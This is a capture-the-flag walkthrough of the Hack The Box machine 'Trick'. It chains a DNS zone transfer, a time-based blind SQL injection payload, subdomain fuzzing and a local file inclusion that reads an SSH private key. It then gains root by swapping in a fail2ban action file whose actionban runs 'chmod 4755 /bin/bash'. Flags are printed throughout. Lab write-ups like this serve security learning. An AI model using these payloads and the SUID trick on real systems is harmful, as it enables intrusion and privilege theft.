[HTB] Trick
2022-08-07 00:41:57

Trick

Enum

nmap

Nmap scan report for trick.htb (10.10.11.166)
Host is up (0.39s latency).
Not shown: 65531 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-server-header: nginx/1.14.2
Service Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1738.39 seconds

DNS Zone Transfer

┌──(kali㉿kali)-[~]
└─$ dig axfr @10.10.11.166 trick.htb

; <<>> DiG 9.17.19-3-Debian <<>> axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.              604800  IN      NS      trick.htb.
trick.htb.              604800  IN      A       127.0.0.1
trick.htb.              604800  IN      AAAA    ::1
preprod-payroll.trick.htb. 604800 IN    CNAME   trick.htb.
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 1129 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Fri Aug 05 11:36:44 CST 2022
;; XFR size: 6 records (messages 1, bytes 231)

The zone transfer leaks the subdomain preprod-payroll.trick.htb; add it to /etc/hosts.

SQL injection

POST /ajax.php?action=login HTTP/1.1
Host: preprod-payroll.trick.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 35
Origin: http://preprod-payroll.trick.htb
Connection: close
Referer: http://preprod-payroll.trick.htb/login.php
Cookie: PHPSESSID=ui4d95mmq5f3b0pih3bp2gubc7

username=admin&password=admin

The username parameter has a time-based blind injection (sqlmap output):

---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 2818 FROM (SELECT(SLEEP(5)))ymjy) AND 'NgWX'='NgWX&password=admin
---

result

# databases
available databases [2]:
[*] information_schema
[*] payroll_db

# payroll_db's tables
Database: payroll_db
[11 tables]
+---------------------+
| position            |
| allowances          |
| attendance          |
| deductions          |
| department          |
| employee            |
| employee_allowances |
| employee_deductions |
| payroll             |
| payroll_items       |
| users               |
+---------------------+

Database: payroll_db
Table: users
[8 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| address   | text         |
| contact   | text         |
| doctor_id | int(30)      |
| id        | int(30)      |
| name      | varchar(200) |
| password  | varchar(200) |
| type      | tinyint(1)   |
| username  | varchar(100) |
+-----------+--------------+

Database: payroll_db
Table: users
[1 entry]
+----+---------------+------------+-----------------------+
| id | name          | username   | password              |
+----+---------------+------------+-----------------------+
| 1  | Administrator | Enemigosss | SuperGucciRainbowCake |
+----+---------------+------------+-----------------------+

Logging in to http://preprod-payroll.trick.htb with Enemigosss:SuperGucciRainbowCake works, but there is nothing useful behind it. :(

Fuzzing subdomains again, this time using the preprod- prefix as a pattern

┌──(kali㉿kali)-[~/htb/Trick]
└─$ ffuf -u http://trick.htb -H 'Host: preprod-FUZZ.trick.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 5480

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://trick.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: preprod-FUZZ.trick.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 5480
________________________________________________

marketing               [Status: 200, Size: 9660, Words: 3007, Lines: 179]
:: Progress: [4989/4989] :: Job [1/1] :: 91 req/sec :: Duration: [0:00:51] :: Errors: 0 ::

Add preprod-marketing.trick.htb to /etc/hosts

LFI

The page parameter at http://preprod-marketing.trick.htb/index.php?page= has an LFI.

Read /home/michael/.ssh/id_rsa through it to get michael's SSH private key.

User

chmod 600 id_rsa
ssh michael@10.10.11.166 -i id_rsa

Get user flag

698bb876ab3abd78fd1e7e54372b2607

priv esc

michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart

Refer to this PoC: https://github.com/rvizx/fail2ban/blob/main/fail2ban

The PoC needs write access to /etc/fail2ban/action.d/iptables-multiport.conf.

The file itself is root-owned and mode 0644, so michael cannot edit it in place. But michael is a member of the security group, and the security group has write permission on the /etc/fail2ban/action.d/ directory:

michael@trick:~$ ls -al /etc/fail2ban/ | grep action.d
drwxrwx---   2 root security  4096 Aug  6 18:27 action.d

Directory write permission is what rename(2) and unlink(2) check, not the mode of the file being replaced, so we can swap the whole file out rather than edit it.
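The check worth running before relying on this (an added example, not from the original writeup): the function below reproduces the Linux rule that replacing a directory entry needs w+x on the directory, with the sticky-bit caveat that blocks the same trick under /tmp, and applies it to the numbers on this page (root:security 0770 directory, michael uid 1001 with gids 1001 and 1002 as shown by `id` further down). Nothing in it is specific to fail2ban; any root-owned file under a group-writable directory is exposed the same way.

```python
import os
import stat

# Taken from the writeup: drwxrwx--- root security on /etc/fail2ban/action.d,
# and uid=1001(michael) groups=1001(michael),1002(security).
ACTION_D_MODE, ACTION_D_UID, ACTION_D_GID = 0o770, 0, 1002
MICHAEL_UID, MICHAEL_GROUPS = 1001, {1001, 1002}


def can_replace_entry(dir_mode, dir_uid, dir_gid, file_uid, uid, groups):
    """Can `uid` rename()/unlink() an entry inside this directory?

    The kernel checks write+search permission on the directory, never the mode
    of the file being replaced, so a 0644 root-owned file under a 0770
    root:security directory is replaceable by every member of security.
    With the sticky bit set (0o1000, as on /tmp) only the file's owner or the
    directory's owner may remove it.
    """
    if uid == 0:
        return True
    if uid == dir_uid:
        bits = (dir_mode >> 6) & 0o7
    elif dir_gid in groups:
        bits = (dir_mode >> 3) & 0o7
    else:
        bits = dir_mode & 0o7
    if bits & 0o3 != 0o3:          # need write (2) and search/execute (1)
        return False
    if dir_mode & stat.S_ISVTX and uid not in (file_uid, dir_uid):
        return False
    return True


def can_replace_path(path, uid=None, groups=None):
    """Run the same check against the live filesystem for the current or a given user."""
    path = os.path.abspath(path)
    d = os.stat(os.path.dirname(path))
    uid = os.geteuid() if uid is None else uid
    groups = (set(os.getgroups()) | {os.getegid()}) if groups is None else set(groups)
    # A file that does not exist yet has no owner to protect with the sticky bit.
    file_uid = os.stat(path).st_uid if os.path.exists(path) else uid
    return can_replace_entry(stat.S_IMODE(d.st_mode), d.st_uid, d.st_gid,
                             file_uid, uid, groups)


if __name__ == "__main__":
    target = "/etc/fail2ban/action.d/iptables-multiport.conf"
    # Offline: the rule applied to the permissions quoted in the writeup.
    print("michael can replace action file:",
          can_replace_entry(ACTION_D_MODE, ACTION_D_UID, ACTION_D_GID, 0,
                            MICHAEL_UID, MICHAEL_GROUPS))
    # On the box: the same check against the real directory for the calling user.
    if os.path.isdir(os.path.dirname(target)):
        print("live check:", can_replace_path(target))
```

The fix on the defensive side follows from the same rule: the directory, not just the action files, has to be root-owned and not group-writable, because fail2ban executes whatever actionban it finds there as root.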

Edit the PoC action file like this (actionban now runs chmod 4755 /bin/bash instead of inserting an iptables rule):

[INCLUDES]
before = iptables-common.conf
[Definition]
actionstart = <iptables> -N f2b-<name>
              <iptables> -A f2b-<name> -j <returntype>
              <iptables> -I <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>
actionstop = <iptables> -D <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>
             <actionflush>
             <iptables> -X f2b-<name>
actioncheck = <iptables> -n -L <chain> | grep -q 'f2b-<name>[ \t]'
actionban = chmod 4755 /bin/bash
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
[Init]
michael@trick:~$ mv iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf
mv: replace '/etc/fail2ban/action.d/iptables-multiport.conf', overriding mode 0644 (rw-r--r--)? y
michael@trick:~$ sudo /etc/init.d/fail2ban restart
[ ok ] Restarting fail2ban (via systemctl): fail2ban.service.

After restarting fail2ban, get ourselves banned by failing the SSH login enough times to trip the sshd jail; when the ban fires, fail2ban runs actionban as root and /bin/bash becomes SUID.

michael@trick:~$ bash -p
bash-5.0# id
uid=1001(michael) gid=1001(michael) euid=0(root) groups=1001(michael),1002(security)
bash-5.0# cat /root/root.txt
de1ea7b2f28daef221556dece37f8abe